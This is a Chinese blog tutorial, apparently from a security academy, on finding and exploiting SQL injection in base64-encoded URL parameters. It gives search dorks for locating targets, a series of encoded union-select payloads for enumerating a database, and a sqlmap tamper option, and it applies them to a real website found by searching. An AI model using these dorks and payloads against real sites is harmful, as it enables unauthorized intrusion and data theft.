本文由掌控安全学院 - sbhglqy 投稿
一、资产搜集
我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于inurl:.php?id=1,可以额外的尝试搜搜1的base64编码值MQ==,即可以搜索inurl:.php?id=MQ==,或者搜索1的md5加密值,即可以搜索inrul:.php?id=a0b923820dcc509a。这样子搜索完,我们可测试的范围就扩大了。此处我就是利用inurl:.php?id=MQ==搜索到了一处存在sql注入的网站。
二、开始sql注入常规流程
(1)判断字符型还是数字型
-
?id=MQ== (原始值为1)
-
?id=MeKAmQ== (原始值为1')
从这两者的反应可以判断出是数字型。
(2)判断是否存在sql注入漏洞
-
?id=MSBhbmQgMT0x (原始值1 and 1=1) 有内容
-
?id=MSBhbmQgMT0y (原始值1 and 1=2) 没有内容,页面下方空白
可以判断出此处可能存在sql注入。
(3)判断列数
-
?id=MSBvcmRlciBieSAz (原始值1 order by 3) 页面内容正常输出
-
?id=MSBvcmRlciBieSA0 (原始值1 order by 4) 报错
可以判断列数为3。
(4)判断显错位。
-
?id=LTEgdW5pb24gc2VsZWN0IDEsMiwz (原始值-1 union select 1,2,3)
显错位为2和3。
(5)在显错位2的位置上尝试获取当前数据库
-
?id=LTEgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwz (原始值-1 union select 1,database(),3)
(6)获取当前数据库中的表
-
id=LTEgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgp
-
原始值:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
(7)接下来就是获取其中某一个表的字段名和字段值了,只需将相应的SQL语句进行BASE64编码,然后输入即可。
三、sqlmap验证
由于传参是需要进行base64编码的,所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上--tamper base64encode.py即可。
总结:测试sql注入的时候不要只局限于明文传输,也要注意编码或者加密后的值。
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线